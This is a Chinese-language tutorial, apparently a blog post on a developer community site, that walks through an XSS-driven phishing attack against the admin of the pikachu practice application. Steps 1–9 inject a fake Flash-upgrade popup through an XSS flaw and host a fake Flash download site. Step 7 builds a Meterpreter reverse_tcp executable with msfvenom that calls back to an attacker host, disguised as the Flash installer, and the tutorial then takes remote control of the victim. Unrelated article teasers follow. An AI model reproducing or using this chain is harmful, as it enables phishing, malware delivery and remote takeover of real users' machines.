1,登陆XSS平台,在公共模板中找到flash弹窗钓鱼打开查看并复制代码

2,将代码保存成js文件

3,目标为pikachu后台的管理员,找一个xss漏洞让管理员的页面引用外部的我们的js文件

4,登陆后台页面执行了引用的外部文件

5,点击立即升级后会下载一个可执行程序,控制下载文件的代码在1.js中,新建一个文件并改名为flash.exe     ,再将1.js文件进行修改,如图

6,搭建一个类似flash官网的网站,将下图一中的最后六个文件放到假网站的根目录,下载的文件在index.html中修改,修改为真的flash安装包名字(如下图二所示),1.js中也使用真的flash安装包名字(如下图三所示)

7,打开kali制作病毒

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.50.131 LPORT=44 44 -f exe > shell.exe

可以得到一个shell.exe文件

8,把shell.exe拖到我们的假网站目录上并改成flash安装包名字

9,登陆pikachu管理员后台并下载安装包,然后在kali中对自己的电脑进行监听或控制,这样就成功了(如果有需要的话可以添加flash图标显得更加逼真)

# xss # 前端
Logo
火山引擎 ADG 社区

火山引擎开发者社区是火山引擎打造的AI技术生态平台,聚焦Agent与大模型开发,提供豆包系列模型(图像/视频/视觉)、智能分析与会话工具,并配套评测集、动手实验室及行业案例库。社区通过技术沙龙、挑战赛等活动促进开发者成长,新用户可领50万Tokens权益,助力构建智能应用。

更多推荐

Chess用户界面设计:Tailwind CSS样式系统和组件库

GitHub推荐项目精选中的ch/chess是一个类似chess.com的多人在线象棋平台,它采用现代化的前端技术栈构建,尤其在用户界面设计上通过Tailwind CSS样式系统和组件库实现了优雅且功能丰富的交互体验。本文将深入探讨该项目如何利用Tailwind CSS打造一致的设计语言和高效的组件系统,为象棋爱好者提供沉浸式的游戏界面。## 🎨 Tailwind CSS样式系统:构建统一视

avatar 火山引擎 ADG 社区

终极指南:GPT-Engineer如何通过AI自动发现代码问题并提升质量

GPT-Engineer是一款强大的AI驱动代码工具,它能帮助开发者自动检测潜在代码问题、优化代码质量,让编程效率提升3倍以上。无论是新手还是资深开发者,都能通过这款工具轻松发现代码中的隐藏缺陷,减少调试时间,释放更多精力在创造性工作上。## 一键发现代码问题:GPT-Engineer的AI审查魔力GPT-Engineer的核心能力在于其内置的智能代码分析系统。通过集成Python代码格式

avatar 火山引擎 ADG 社区

SatDump中的纠错编码技术:从RS码到Turbo码的完整实现指南

在卫星数据传输过程中,信号往往会受到各种干扰,导致数据错误。SatDump作为一款通用卫星数据处理软件,集成了多种先进的纠错编码技术,确保从卫星接收到的数据能够准确解码。本文将深入解析SatDump中从Reed-Solomon(RS)码到Turbo码的实现细节,帮助读者理解这些技术如何保障卫星通信的可靠性。## 为什么纠错编码对卫星数据至关重要?卫星与地面站之间的通信链路面临着空间辐射、大

avatar 火山引擎 ADG 社区